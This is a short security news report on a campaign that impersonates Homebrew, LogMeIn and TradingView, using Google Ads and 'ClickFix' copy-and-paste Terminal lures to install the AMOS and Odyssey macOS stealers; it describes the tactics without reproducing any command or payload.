Cybersecurity researchers have uncovered a sophisticated malicious campaign that targets macOS developers by impersonating legitimate platforms such as Homebrew, LogMeIn, and TradingView. The threat actors employ deceptive tactics, including ‘ClickFix’ methods, to manipulate users into running malicious terminal commands that install malware like AMOS (Atomic macOS Stealer) and Odyssey. Hunt.io researchers identified over 85 domains associated with this campaign, which mimic the genuine services to lure users into downloading malicious software. The campaign’s use of Google Ads to promote the fraudulent domains highlights a growing trend of exploiting advertising networks for cyberattacks. Threat hunters from Hunt.io discovered that some of these domains are being promoted through Google Ads, making them appear in search results. This tactic allows the attackers to reach a broader audience and increase the likelihood of successful infections. The malicious sites are designed to look authentic, featuring convincing download portals and instructions for users to copy and run a curl command in Terminal. In some cases, the commands are presented as a ‘connection security confirmation step’ for TradingView, but clicking the ‘copy’ button results in a base64-encoded installation command being copied to the clipboard instead of the genuine Cloudflare verification ID. This deceptive approach underscores the evolving sophistication of cyber threats and the need for heightened security awareness among macOS users. The incident also raises concerns about the misuse of advertising platforms to spread malware, emphasizing the importance of verifying the authenticity of websites and the commands executed in command-line interfaces.